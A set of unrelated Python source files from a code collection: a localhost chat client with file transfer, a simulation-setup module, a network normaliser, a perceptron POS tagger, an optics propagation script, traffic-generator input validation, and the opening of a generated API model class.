{"seq_id":"461402930","text":"import socket\nimport time\nimport threading\nimport sys\nimport multiprocessing\nfrom socket import SHUT_RDWR\n\nHOST = '127.0.0.1' # Server IP address\nPORT = 20000 # Port the server is listening on\nudp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nudp.setblocking(0)\nserverOnline = False\n_FINISH = False\ndest = (HOST, PORT)\n\n# thread used while the connection is active\ndef KEEP(udp):\n while True:\n global _FINISH\n if _FINISH:\n break\n try: \n msg, cliente = udp.recvfrom(1024)\n \n # convert msg to a string\n msg = str(msg.decode(\"utf-8\"))\n\n # reply handler for ACK:\n if msg.find(\"ACK\") != -1:\n ##print(\"ACK\") ## print ACK to the console\n global serverOnline\n serverOnline = True\n\n # reply handler for KEEP:\n if msg.find(\"KEEP\") != -1:\n ##print(\"KEEP\") ## print KEEP to the console\n response = str.encode(\"KEEP\")\n udp.sendto(response, cliente)\n\n # reply handler for MSG:\n if msg.find(\"MSG:\") != -1:\n mensagem = msg[4:]\n text = mensagem.split(\":\")\n print(text[0]+\" disse: \"+text[1])\n\n # reply handler for LIST\n if msg.find(\"LIST:\") != -1:\n mensagem = msg[5:]\n print(\"Clientes conectados: \")\n print(mensagem)\n\n # reply handler for INFO\n if msg.find(\"INFO:\") != -1:\n mensagem = msg[5:]\n print(mensagem)\n \n\n except Exception as ex:\n pass\n\nkeep = threading.Thread(target=KEEP, 
args=(udp,))\nkeep.start()\n\n\n# check whether the server is online\ndef checkServer():\n start = time.time()\n while time.time() - start < 10:\n if serverOnline == 1:\n return\n if serverOnline == 1:\n return\n else:\n print(\"Server offline\")\n \n# message for the initial handshake\nmsg = \"USER:\"\nmsg = msg+input(\"Nome de usuário: \")\nudp.sendto (msg.encode(), dest)\nwhile msg != 'exit':\n ### wait for the server's reply after USER:\n if msg.find(\"USER:\") != -1:\n checkServer()\n\n ## check whether the command is a /list\n elif msg.find(\"/list\") != -1:\n msg = \"LIST\"\n udp.sendto (msg.encode(), dest)\n\n ## close the connection with the server\n elif msg.find(\"/bye\") != -1:\n msg = \"BYE\"\n udp.sendto (msg.encode(), dest)\n _FINISH = True\n keep.join()\n sys.exit()\n break\n\n ## send a file to the server, format /file <arq>\n elif msg.find(\"/file \") != -1:\n tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n fileName = msg[6:]\n try:\n file = open(fileName, 'rb')\n msg = \"FILE\"\n msg = msg+fileName+\":\"\n l = file.read(1024)\n tcp.connect(dest)\n tcp.send (msg.encode())\n while (l):\n tcp.send(l)\n l = file.read(1024)\n \n tcp.close()\n file.close()\n \n except Exception as ex:\n print (ex)\n \n ## try to receive the file from the server\n elif msg.find(\"/get \") != -1:\n try:\n ## file name\n fileName = msg[5:]\n sendData = \"GET\"+str(fileName)\n \n ## connect over TCP\n tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n tcp.connect(dest)\n \n ## send the request\n tcp.send(sendData.encode())\n\n ## receive the file\n file = tcp.recv(1024)\n\n ## check whether the file exists\n if (file.decode().find(\"INFO:\") != -1):\n print(\"Arquivo não encontrado\")\n\n ## if the file exists, store it\n else:\n f = open(fileName, 'wb')\n while(file):\n f.write(file)\n file = tcp.recv(1024)\n f.close()\n tcp.close()\n except Exception as ex:\n print (ex)\n \n ## anything else is treated as a MSG\n else:\n msg = \"MSG:\"+msg\n udp.sendto (msg.encode(), dest) \n msg = input()\n\n_FINISH = True\nkeep.join()\nsys.exit()\nudp.close()\n","sub_path":"Trabalho Redes/cliente/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"473275988","text":"from rsopt.codes import _TEMPLATED_CODES\nfrom pykern.pkrunpy import run_path_as_module\n\n\ndef read_setup_dict(input):\n for name, values in input.items():\n yield name, values\n\n\n_SETUP_READERS = {\n dict: read_setup_dict\n}\n\n# Note to self: classmethods are used for attributes that are set on a per-execution-method basis and should never change;\n# we can then organize by class and call the classmethod to find the value.\n# _REQUIRED_KEYS is name-mangled because technically any subclass should inherit the required\n# keys of its parent. 
\n\n\nclass Setup:\n _REQUIRED_KEYS = ('execution_type',)\n RUN_COMMAND = None\n NAME = None\n\n def __init__(self):\n self.setup = {}\n\n @classmethod\n def get_setup(cls, setup, code):\n # verify execution type exists\n cls._check_setup(setup)\n\n # TODO: rsmpi or mpi should change the run command\n execution_type = setup['execution_type']\n\n # verify requirements for given execution_type are met in setup\n setup_classes[code]._check_setup(setup)\n\n return setup_classes[code]\n\n @classmethod\n def _check_setup(cls, setup):\n for key in cls._REQUIRED_KEYS:\n assert setup.get(key), f\"{key} must be defined in setup\"\n\n @classmethod\n def templated(cls):\n return cls.NAME in _TEMPLATED_CODES\n\n @classmethod\n def get_run_command(cls, is_parallel):\n return cls.RUN_COMMAND\n\n def parse(self, name, value):\n self.setup[name] = value\n\n\nclass Python(Setup):\n _REQUIRED_KEYS = ('function',)\n RUN_COMMAND = 'python' # really translates to sys.executable\n NAME = 'python'\n\n @property\n def function(self):\n if self.setup.get('input_file'):\n module = run_path_as_module(self.setup['input_file'])\n function = getattr(module, self.setup['function'])\n return function\n\n return self.setup['function']\n\n\nclass Elegant(Setup):\n _REQUIRED_KEYS = ('input_file',)\n RUN_COMMAND = None\n SERIAL_RUN_COMMAND = 'elegant'\n PARALLEL_RUN_COMMAND = 'Pelegant'\n NAME = 'elegant'\n\n @classmethod\n def get_run_command(cls, is_parallel):\n if is_parallel:\n return cls.PARALLEL_RUN_COMMAND\n else:\n return cls.SERIAL_RUN_COMMAND\n\n\nclass Opal(Setup):\n _REQUIRED_KEYS = ('input_file',)\n RUN_COMMAND = 'opal'\n NAME = 'opal'\n\n\nclass Genesis(Setup):\n _REQUIRED_KEYS = ('input_file', )\n SERIAL_RUN_COMMAND = 'genesis'\n PARALLEL_RUN_COMMAND = 'genesis_mpi'\n NAME = 'genesis'\n\n @classmethod\n def get_run_command(cls, is_parallel):\n if is_parallel:\n return cls.PARALLEL_RUN_COMMAND\n else:\n return cls.SERIAL_RUN_COMMAND\n\n\n# This maybe should be linked to rsopt.codes._SUPPORTED_CODES,\n# but is not expected to change often, so update manually for now\nsetup_classes = {\n 'python': Python,\n 'elegant': Elegant,\n 'opal': Opal,\n 'genesis': Genesis\n}","sub_path":"rsopt/configuration/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"125301540","text":"__author__ = 'SungJoonPark'\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\ndef get_network(network_file):\r\n # read a sif-formatted network file and return a normalized adjacency matrix\r\n\r\n #network file format should be sif\r\n network_dict = {}\r\n #construct dict\r\n with open(network_file, 'r') as r:\r\n for line in r:\r\n node1= line.strip().split(\"\\t\")[0]\r\n node2= line.strip().split(\"\\t\")[2]\r\n edge_type = line.strip().split(\"\\t\")[1]\r\n if node1 not in network_dict:\r\n network_dict[node1] = {node2:1}\r\n else:\r\n if node2 not in network_dict[node1]:\r\n network_dict[node1][node2]=1\r\n\r\n if node2 not in network_dict:\r\n network_dict[node2] = {node1:1}\r\n else:\r\n if node1 not in network_dict[node2]:\r\n network_dict[node2][node1]=1\r\n\r\n # add self-loops: connect each node to itself\r\n for key in network_dict.keys():\r\n if key not in network_dict[key].keys():\r\n network_dict[key][key]=1
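\r\n\r\n # note (reviewer sketch): the block below computes the symmetrically\r\n # normalized adjacency A_ij / sqrt(d_i * d_j); a vectorized equivalent is\r\n # d = np.sqrt(np.sum(filter_network, axis=0)); filter_network / np.outer(d, d)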
\r\n\r\n # build the adjacency matrix\r\n network_df = pd.DataFrame(network_dict).fillna(0)\r\n # filter rows where the gene symbol looks like a stray integer\r\n #filter_network = network_df.iloc[18:,18:]\r\n # after fixing the Excel string problem the full matrix is kept\r\n filter_network = network_df.iloc[0:,0:]\r\n # diagonal matrix whose entries are the column sums (node degrees) of filter_network\r\n diagonal_matrix = pd.DataFrame(np.diag(np.sum(filter_network,axis=0)),index=filter_network.index, columns=filter_network.columns)\r\n #get non zero index from filter network\r\n non_zero_index = list(filter_network[filter_network != 0].stack().index)\r\n #normalize filter network\r\n for non_zero_tuple in non_zero_index:\r\n filter_network.loc[non_zero_tuple[0],non_zero_tuple[1]] = float(filter_network.loc[non_zero_tuple[0],non_zero_tuple[1]]) / np.sqrt(diagonal_matrix.loc[non_zero_tuple[0],non_zero_tuple[0]]*diagonal_matrix.loc[non_zero_tuple[1],non_zero_tuple[1]])\r\n\r\n return filter_network\r\n\r\n","sub_path":"network/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":2052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"82019489","text":"# -*- coding: utf-8 -*-\n# Author: XuMing <shibing624@126.com>\n# Date: 17/8/10\n# Brief: averaged perceptron POS-tagger test\n\nimport os\nimport random\nfrom collections import defaultdict\nimport pickle\nimport logging\n\nfrom AveragePerceptron import AveragePerceptron\n\nPICKLE = \"../data/bp/trontagger-0.1.pkg\"\nTRAIN_FILE_PATH = \"../data/bp/train.txt\"\nTEST_FILE_PATH = \"../data/bp/test.txt\"\n\n\nclass PerceptronTagger():\n START = ['-START-', '-START2-']\n END = ['-END-', '-END2-']\n AP_MODEL_LOC = os.path.join(os.path.dirname(__file__), PICKLE)\n\n def __init__(self, load=True):\n self.model = AveragePerceptron()\n self.tagdict = {}\n self.classes = set()\n if load:\n self.load(self.AP_MODEL_LOC)\n\n def tag(self, corpus):\n s_split = lambda t: t.split('\\n')\n w_split = lambda s: s.split()\n\n def split_sents(corpus):\n for s in s_split(corpus):\n yield w_split(s)\n\n prev, prev2 = self.START\n tokens = []\n for words in split_sents(corpus):\n context = self.START + [self._normalize(w) for w in words] + self.END\n for i, word in enumerate(words):\n tag = self.tagdict.get(word)\n if not tag:\n features = self._get_features(i, word, context, prev, prev2)\n tag = self.model.predict(features)\n tokens.append((word, tag))\n prev2 = prev\n prev = tag\n return tokens\n\n def load(self, loc):\n try:\n w_td_c = pickle.load(open(loc, 'rb'))\n except IOError:\n raise IOError(\"Missing trontagger.pkg file.\")\n self.model.weights, self.tagdict, self.classes = w_td_c\n self.model.classes = self.classes\n return None\n\n def _normalize(self, word):\n if '-' in word and word[0] != '-':\n return '!HYPHEN'\n elif word.isdigit() and len(word) == 4:\n return '!YEAR'\n elif word[0].isdigit():\n return '!DIGITS'\n else:\n return word.lower()\n\n def _get_features(self, i, word, context, prev, prev2):\n i += len(self.START)\n features = defaultdict(int)\n\n def add(name, *args):\n features[' '.join((name,) + tuple(args))] += 1\n\n # constant feature\n add('bias')\n add('i suffix', word[-3:])\n add('i pref1', word[0])\n add('i-1 tag', prev)\n add('i-2 tag', prev2)\n add('i tag+i-2 tag', prev, prev2)\n add('i word', context[i])\n add('i-1 tag+i word', prev, context[i])\n add('i-1 word', context[i - 1])\n add('i-1 suffix', context[i - 1][-3:])\n add('i-2 word', context[i - 2])\n add('i+1 word', context[i + 1])\n add('i+1 suffix', context[i + 1][-3:])\n add('i+2 word', context[i + 2])\n return features\n\n def _make_tagdict(self, sentences):\n counts = defaultdict(lambda: defaultdict(int))\n for words, tags in sentences:\n for word, tag in zip(words, tags):\n counts[word][tag] += 1\n self.classes.add(tag)
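\n # worked example: with freq_thresh=20 and ambiguity_thresh=0.97, a word\n # seen 25 times must carry the same tag in all 25 occurrences before it is\n # frozen into tagdict (24/25 = 96% falls short and stays with the model).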
\n freq_thresh = 20\n ambiguity_thresh = 0.97\n for word, tag_freqs in counts.items():\n tag, mode = max(tag_freqs.items(), key=lambda item: item[1])\n n = sum(tag_freqs.values())\n if n >= freq_thresh and (float(mode) / n) >= ambiguity_thresh:\n self.tagdict[word] = tag\n\n def _pc(self, n, d):\n return (float(n) / d) * 100\n\n def train(self, sentences, save_loc=None, nr_iter=5):\n self._make_tagdict(sentences)\n self.model.classes = self.classes\n for iter_ in range(nr_iter):\n c = 0\n n = 0\n for words, tags in sentences:\n prev, prev2 = self.START\n context = self.START + [self._normalize(w) for w in words] + self.END\n for i, word in enumerate(words):\n guess = self.tagdict.get(word)\n if not guess:\n feats = self._get_features(i, word, context, prev, prev2)\n guess = self.model.predict(feats)\n self.model.update(tags[i], guess, feats)\n prev2 = prev\n prev = guess\n c += guess == tags[i]\n n += 1\n random.shuffle(sentences)\n logging.info(\"Iter {0}: {1}/{2}={3}\".format(iter_, c, n, self._pc(c, n)))\n self.model.average_weights()\n if save_loc is not None:\n pickle.dump((self.model.weights, self.tagdict, self.classes),\n open(save_loc, 'wb'), -1)\n return None\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO)\n tagger = PerceptronTagger(False)\n try:\n tagger.load(PICKLE)\n print(tagger.tag(\"how are you ?\"))\n logging.info(\"Start testing...\")\n right = 0.0\n total = 0.0\n sentence = ([], [])\n for line in open(TEST_FILE_PATH):\n params = line.split()\n if len(params) != 2: continue\n sentence[0].append(params[0])\n sentence[1].append(params[1])\n if params[0] == \".\":\n text = \"\"\n words = sentence[0]\n tags = sentence[1]\n for i, word in enumerate(words):\n text += word\n if i < len(words) - 1: # space between words, none trailing\n text += \" \"\n outputs = tagger.tag(text)\n assert len(tags) == len(outputs)\n total += len(tags)\n for o, t in zip(outputs, tags):\n if o[1].strip() == t:\n right += 1\n sentence = ([], [])\n logging.info(\"Precision : %f\", right / total)\n except IOError:\n logging.info(\"Reading corpus...\")\n training_data = []\n sentence = ([], [])\n for line in open(TRAIN_FILE_PATH):\n params = line.strip().split('\\t') # strip the newline so tags are clean\n sentence[0].append(params[0])\n sentence[1].append(params[1])\n if params[0] == \".\":\n training_data.append(sentence)\n sentence = ([], [])\n logging.info(\"training corpus size: %d\", len(training_data))\n logging.info(\"Start training...\")\n tagger.train(training_data, save_loc=PICKLE)\n logging.info(\"training end.\")\n","sub_path":"14BP/PerceptronTagger.py","file_name":"PerceptronTagger.py","file_ext":"py","file_size_in_byte":6454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"581319066","text":"\"\"\"\nCreated on Wed May 20 23:21:44 2020\n\nBased on the kernel functions found in Diffractio module (https://pypi.org/project/diffractio/)\n\nNotation from Mertz, \"Introduction to Optical Microscopy\"\n\nSimulates the propagation of a field using Rayleigh-Sommerfeld or Fresnel integrals \n\n@author: Andrea Bassi\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy import pi, sqrt, exp\nfrom numpy.fft import fft2,ifft2, ifftshift
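\n\n# convention note (reviewer): k below is the wavenumber n/wavelength in cycles\n# per unit length, so each phase term carries an explicit 2*pi factor.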
\n\n\ndef kernelRS(X, Y, z, wavelength, n):\n \"\"\"Kernel for Rayleigh-Sommerfeld propagation\n\n Parameters:\n X (numpy.array): positions x\n Y (numpy.array): positions y\n wavelength (float): wavelength of incident fields\n z (float): distance for propagation\n n (float): refraction index of background\n \n Returns:\n complex np.array: kernel \n\n \"\"\"\n \n k = n / wavelength\n r = sqrt(X**2 + Y**2 + z**2)\n return - 1.j*k*z/r * exp(1.j * 2*pi*k*r)/r * ( 1 - 1 /(1.j*2*pi*k*r) )\n\ndef kernelFresnel(X, Y, z, wavelength, n):\n \"\"\"Kernel for Fresnel propagation\n\n Parameters:\n X (numpy.array): positions x\n Y (numpy.array): positions y\n wavelength (float): wavelength of incident fields\n z (float): distance for propagation\n n (float): refraction index of background\n\n Returns:\n complex np.array: kernel\n \"\"\" \n \n k = n / wavelength\n return - 1.j*k/z * exp( 1.j*2*pi*k*z + 1.j*pi*k/z*(X**2 + Y**2) ) \n\ndef show_fields( fields, titles, kind = 'intensity', extent = (-50,50,-50,50) ):\n \"\"\" Shows fields with matplotlib \"\"\"\n \n _fig, axs = plt.subplots(1,len(fields))\n \n for idx, E in enumerate(fields):\n \n if kind == 'real':\n data_to_show = np.real(E) # Real part\n elif kind == 'phase':\n data_to_show = np.angle(E) # Phase\n elif kind == 'intensity': \n data_to_show = np.abs(E)**2 # Intensity\n else: \n data_to_show = np.abs(E) # Magnitude\n \n axs[idx].imshow(data_to_show, interpolation='none',\n cmap='gray',\n origin='lower',\n extent = extent,\n vmin = 0,\n vmax = None\n )\n ylabel = 'y ($\\mu$m)' if idx== 0 else None\n axs[idx].set(xlabel = 'x ($\\mu$m)',\n ylabel = ylabel,\n title = titles[idx],\n ) \n plt.show()\n \num = 1.0\nwavelength = 0.532 * um \nn = 1\n\n\nNsamples = 1024 # number of pixels\nL = 300 * um # extent of the xy space\nx = y = np.linspace(-L/2, +L/2, Nsamples)\nX, Y = np.meshgrid(x,y)\n\n\"\"\" create a constant field E0 (plane wave propagating along z)\"\"\"\nE0 = np.ones([Nsamples, Nsamples])\n\n# \"\"\" create a plane wave with certain kx and ky \"\"\" \n# kx = 0.1\n# ky = 0.0\n# E0 = np.exp(-1.j*2*pi* (kx*X+ky*Y))\n# E0 = np.cos(2*pi* (kx*X+ky*Y)) \n\n\"\"\" insert a square mask \"\"\"\nside = 30 * um\nindexes = (np.abs(X)>side/2) | (np.abs(Y)>side/2)\nE0[indexes] = 0\n\n\"\"\"calculate the free space propagator (pick one kernel) \"\"\"\nz = 1000 * um\n#D = kernelRS(X, Y, z, wavelength, n) # Rayleigh-Sommerfeld alternative\nD = kernelFresnel(X, Y, z, wavelength, n)\n\n\"\"\" calculate E1 as the convolution of E0 and D, using Fast Fourier Transform \"\"\"\ndx = x[1]-x[0]\ndy = y[1]-y[0]\nE1 = ifftshift( ifft2 (fft2(E0) * fft2(D) ) ) * dx *dy 
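\n# note (reviewer): the dx*dy factor makes the FFT product approximate the\n# continuous convolution integral of E0 with the kernel D on the sampled grid.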
\n\n\"\"\" show the fields as magnitude, intensity, phase or real part \"\"\"\nshow_fields(fields = (E0,E1),\n titles = ('E0', f'E1, z= {z}'),\n kind = 'abs',\n extent = (-L/2,L/2,-L/2,L/2)\n )","sub_path":"RS_Fresnel_propagation/RS_Fresnel.py","file_name":"RS_Fresnel.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
{"seq_id":"621302629","text":"from snappi_trex.exceptions import SnappiTrexException\nfrom snappi_trex.util import Util\n\nclass Validation(object):\n \"\"\"This class contains functions to validate the input of various\n configuration components. It will throw a SnappiTrexException for any\n invalid inputs that it detects.\n \"\"\"\n\n @staticmethod\n def validate_import():\n error = None\n try:\n import trex.stl.api as trex\n except Exception as e:\n error = e\n if error is not None:\n raise SnappiTrexException('Failed to import TRex STL API. Please check that the correct system path was added. See usage.md for details.')\n\n\n @staticmethod\n def validate_connection(c):\n error = None\n try:\n # connect to server\n c.connect()\n except Exception as e:\n error = e\n \n if error is not None:\n print(error)\n raise SnappiTrexException('Could not connect to T-Rex server. Please verify connection info.')\n\n \n @staticmethod\n def validate_host(host):\n parse_host = host.split(':')\n if len(parse_host) > 2:\n raise SnappiTrexException('\\'{}\\' is an invalid hostname'.format(host))\n if len(parse_host) > 1 and not parse_host[1].isdigit():\n raise SnappiTrexException('\\'{}\\' is an invalid hostname'.format(host))\n\n\n @staticmethod\n def validate_rate(rate):\n \"\"\"\n \"\"\"\n pps = bps = percent = None\n if rate['choice'] == 'pps':\n pps = rate['pps']\n elif rate['choice'] == 'bps':\n bps = rate['bps']\n elif rate['choice'] == 'kbps':\n bps = rate['kbps']\n elif rate['choice'] == 'mbps':\n bps = rate['mbps']\n elif rate['choice'] == 'gbps':\n bps = rate['gbps']\n elif rate['choice'] == 'percentage':\n percent = rate['percentage']\n else:\n raise SnappiTrexException('Invalid \\'rate\\' choice')\n\n if pps is not None:\n if not isinstance(pps, (str, int, float)):\n raise SnappiTrexException('\\'pps\\' must be integer or float')\n if bps is not None:\n if not isinstance(bps, (str, int, float)):\n raise SnappiTrexException('\\'(k/m/g)bps\\' must be integer or float')\n if percent is not None:\n if not isinstance(percent, (str, int, float)):\n raise SnappiTrexException('\\'percentage\\' must be integer or float')\n\n @staticmethod\n def validate_duration(duration):\n \"\"\"\n \"\"\"\n if duration['choice'] == 'fixed_packets':\n if not isinstance(duration['fixed_packets']['packets'], int):\n raise SnappiTrexException('\\'fixed_packets\\' must be integer')\n\n elif duration['choice'] == 'fixed_seconds':\n raise SnappiTrexException('T-Rex does not support fixed_seconds duration choice')\n\n elif duration['choice'] == 'continuous':\n pass\n\n elif duration['choice'] == 'burst':\n if 'inter_burst_gap' in duration['burst']:\n if duration['burst']['inter_burst_gap']['choice'] == 'nanoseconds':\n ibg = duration['burst']['inter_burst_gap']['nanoseconds']\n elif duration['burst']['inter_burst_gap']['choice'] == 'microseconds':\n ibg = duration['burst']['inter_burst_gap']['microseconds']\n elif duration['burst']['inter_burst_gap']['choice'] == 'bytes':\n raise SnappiTrexException('T-Rex does not support bytes \\'inter_burst_gap\\' choice')\n else:\n raise SnappiTrexException('Invalid \\'inter_burst_gap\\' option')\n\n if not isinstance(ibg, float) and not isinstance(ibg, int):\n raise SnappiTrexException('\\'inter_burst_gap\\' must be integer or float')\n else:\n raise SnappiTrexException('Invalid \\'duration\\' choice')\n\n \n @staticmethod\n def validate_packet(packet_headers):\n from snappi_trex.info import Info\n header_info = Info.get_header_info()\n if packet_headers is None:\n raise SnappiTrexException('Flow packet cannot be empty')\n for header in packet_headers:\n\n header_name = header['choice']\n if header_name not in header_info:\n raise SnappiTrexException('Invalid packet \\'header\\' choice')\n # only look up the scapy name after the membership check above\n scapy_header = header_info[header_name]['scapy_name']\n\n for field in header[header_name]:\n\n if field == 'choice':\n continue\n\n if (header_name == 'icmp' or header_name == 'icmpv6') and field == 'echo':\n for icmp_field in header[header_name][field]:\n field_info = header_info[header_name][icmp_field]\n 
Validation.validate_value_option(\n header_field=header[header_name][field][icmp_field],\n layer_type=scapy_header,\n length=field_info['length']\n )\n continue\n\n if field not in header_info[header_name]:\n raise SnappiTrexException('\\'{0}\\' is not a supported \\'{1}\\' field'.format(field, header_name))\n \n header_field = header[header_name][field]\n if header_name == 'ipv4' and field == 'priority':\n if 'raw' not in header['ipv4']['priority']:\n raise SnappiTrexException('ipv4 \\'priority\\' only supports \\'raw\\' option')\n header_field = header['ipv4'][field]['raw']\n field_info = header_info[header_name][field]\n Validation.validate_value_option(\n header_field=header_field,\n layer_type=scapy_header,\n length=field_info['length']\n )\n\n\n @staticmethod\n def validate_size(f_size):\n if f_size['choice'] == 'increment':\n start = f_size['increment']['start']\n end = f_size['increment']['end']\n step = f_size['increment']['step']\n if not isinstance(start, int):\n raise SnappiTrexException('increment packet size \\'start\\' must be integer')\n if not isinstance(end, int):\n raise SnappiTrexException('increment packet size \\'end\\' must be integer')\n if not isinstance(step, int):\n raise SnappiTrexException('increment packet size \\'step\\' must be integer')\n\n elif f_size['choice'] == 'random':\n start = f_size['random']['min']\n end = f_size['random']['max']\n if not isinstance(start, int):\n raise SnappiTrexException('random packet size \\'start\\' must be integer')\n if not isinstance(end, int):\n raise SnappiTrexException('random packet size \\'end\\' must be integer')\n\n elif f_size['choice'] == 'fixed':\n val = f_size['fixed']\n if not isinstance(val, int):\n raise SnappiTrexException('\\'fixed\\' packet size must be integer')\n\n else:\n raise SnappiTrexException('Invalid packet \\'size\\' choice')\n\n\n @staticmethod\n def validate_value_option(header_field, layer_type, length):\n if header_field['choice'] == 'value':\n Validation.validate_address(header_field['value'], layer_type, length)\n elif header_field['choice'] == 'values':\n for val in header_field['values']:\n Validation.validate_address(val, layer_type, length)\n elif header_field['choice'] == 'increment':\n Validation.validate_increment(header_field['increment'], layer_type, length, 1)\n elif header_field['choice'] == 'decrement':\n Validation.validate_increment(header_field['decrement'], layer_type, length, -1)\n else: \n raise SnappiTrexException('Invalid field value choice')\n\n \n @staticmethod\n def validate_increment(field_inc, layer_type, length, dir):\n Validation.validate_address(field_inc['start'], layer_type, length)\n Validation.validate_address(field_inc['step'], layer_type, length)\n length = min(length, 64)\n if not isinstance(field_inc['count'], int):\n raise SnappiTrexException('\\'count\\' must be integer')\n start = Util.convert_to_long(field_inc['start'], layer_type)\n step = Util.convert_to_long(field_inc['step'], layer_type)\n cnt = field_inc['count']\n if step * cnt > Util.get_mask(length):\n raise SnappiTrexException('step*count cannot exceed the header field range')\n if length == 64 and start + dir*step*cnt > Util.get_mask(64) and start + dir*step*cnt < 0:\n raise SnappiTrexException('step*count is too high. 
Overflow is not supported for 8 byte fields')\n\n \n @staticmethod\n def validate_address(addr, layer_type, length):\n error = False\n try:\n val = Util.convert_to_long(addr, layer_type)\n if val > Util.get_mask(length):\n error = True\n except (ValueError, SyntaxError):\n error = True\n if error:\n raise SnappiTrexException('{0} is not a valid {1} address'.format(addr, layer_type))\n\n\n @staticmethod\n def validate_transmit(payload, config):\n if config is None:\n return\n all_flows = []\n for f in config.flows:\n all_flows.append(f.name)\n\n if payload.flow_names is not None:\n for f in payload.flow_names:\n if f not in all_flows:\n raise SnappiTrexException('{} is an unrecognized flow name'.format(f))\n if (payload.state != 'start') and (payload.state != 'stop') and (payload.state != 'pause'):\n raise SnappiTrexException('{} is not a valid transmit state'.format(payload.state))\n\n\n @staticmethod\n def validate_capture(payload, port_ids):\n if payload.port_names is not None:\n for p_name in payload.port_names:\n if p_name not in port_ids:\n raise SnappiTrexException('{} is an unrecognized port name'.format(p_name))\n if (payload.state != 'start') and (payload.state != 'stop'):\n raise SnappiTrexException('{} is not a valid capture state'.format(payload.state))\n\n\n @staticmethod\n def validate_capture_request(request, port_ids):\n p_name = request.port_name\n if p_name not in port_ids:\n raise SnappiTrexException('{} is an unrecognized port name'.format(p_name))\n\n\n @staticmethod\n def validate_link(payload, port_ids):\n if payload.port_names is not None:\n for p_name in payload.port_names:\n if p_name not in port_ids:\n raise SnappiTrexException('\\'{}\\' is an unrecognized port name'.format(p_name))\n if (payload.state != 'up') and (payload.state != 'down'):\n raise SnappiTrexException('{} is not a valid link state'.format(payload.state))\n\n\n @staticmethod\n def validate_metrics_request(request, port_ids):\n if request.choice is not None and request.choice != 'port':\n raise SnappiTrexException('\\'{}\\' is not a supported metrics choice'.format(request.choice))\n if request.port.port_names is not None:\n for p_name in request.port.port_names:\n if p_name not in port_ids:\n raise SnappiTrexException('\\'{}\\' is not a recognized port'.format(p_name))\n\n col_names = ['link', 'capture', 'frames_tx', 'frames_rx',\n 'bytes_tx', 'bytes_rx', 'frames_tx_rate', 'frames_rx_rate', \n 'bytes_tx_rate', 'bytes_rx_rate']\n if request.port.column_names is not None:\n for col in request.port.column_names:\n if col not in col_names:\n raise SnappiTrexException('\\'{}\\' is not a supported metrics column'.format(col))\n\n\n @staticmethod\n def validate_capture_settings(settings, port_ids):\n from snappi_trex.info import Info\n if settings is None:\n return\n for s in settings:\n for p_name in s['port_names']:\n if p_name not in port_ids:\n raise SnappiTrexException('\\'{}\\' is not a recognized port'.format(p_name))\n\n if s['format'] != 'pcap':\n raise SnappiTrexException('\\'{}\\' is not a supported capture format'.format(s['format']))\n if 'packet_size' in s and s['packet_size'] is not None:\n raise SnappiTrexException('maximum capture packet size options are not supported')\n # if not s['overwrite']:\n # raise SnappiTrexException('overwrite not supported for captures')\n\n capture_filter_info = Info.get_capture_filter_info()\n if 'filters' in s:\n for f in s['filters']:\n for proto in f:\n if proto == 'choice':\n continue\n if proto not in 
capture_filter_info:\n raise SnappiTrexException('\\'{}\\' is not a supported capture filter protocol'.format(proto))\n for field in f[proto]:\n if field not in capture_filter_info[proto]:\n raise SnappiTrexException('\\'{}\\' is not a supported capture filter {} field'.format(field, proto))\n\n\n\n\n\n\n\n\n","sub_path":"snappi_trex/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":13694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"495108398","text":"# coding: utf-8\n\n\"\"\"\n MBTA\n\n MBTA service API. https://www.mbta.com Source code: https://github.com/mbta/api # noqa: E501\n\n The version of the OpenAPI document: 3.0\n Contact: developer@mbta.com\n Generated by: https://openapi-generator.tech\n\"\"\"\n\n\nimport pprint\nimport re # noqa: F401\n\nimport six\n\nfrom openapi_client.configuration import Configuration\n\n\nclass InformedEntity(object):\n \"\"\"NOTE: This class is auto generated by OpenAPI Generator.\n Ref: https://openapi-generator.tech\n\n Do not edit the class manually.\n \"\"\"\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n openapi_types = {\n 'trip': 'str',\n 'stop': 'str',\n 'route_type': 'int',\n 'route': 'str',\n 'facility': 'str',\n 'direction_id': 'int',\n 'activities': 'list[str]'\n }\n\n attribute_map = {\n 'trip': 'trip',\n 'stop': 'stop',\n 'route_type': 'route_type',\n 'route': 'route',\n 'facility': 'facility',\n 'direction_id': 'direction_id',\n 'activities': 'activities'\n }\n\n def __init__(self, trip=None, stop=None, route_type=None, route=None, facility=None, direction_id=None, activities=None, local_vars_configuration=None): # noqa: E501\n \"\"\"InformedEntity - a model defined in OpenAPI\"\"\" # noqa: E501\n if local_vars_configuration is None:\n local_vars_configuration = Configuration()\n self.local_vars_configuration = local_vars_configuration\n\n self._trip = None\n self._stop = None\n self._route_type = None\n self._route = None\n self._facility = None\n self._direction_id = None\n self._activities = None\n self.discriminator = None\n\n if trip is not None:\n self.trip = trip\n if stop is not None:\n self.stop = stop\n if route_type is not None:\n self.route_type = route_type\n if route is not None:\n self.route = route\n if facility is not None:\n self.facility = facility\n if direction_id is not None:\n self.direction_id = direction_id\n if activities is not None:\n self.activities = activities\n\n @property\n def trip(self):\n \"\"\"Gets the trip of this InformedEntity. # noqa: 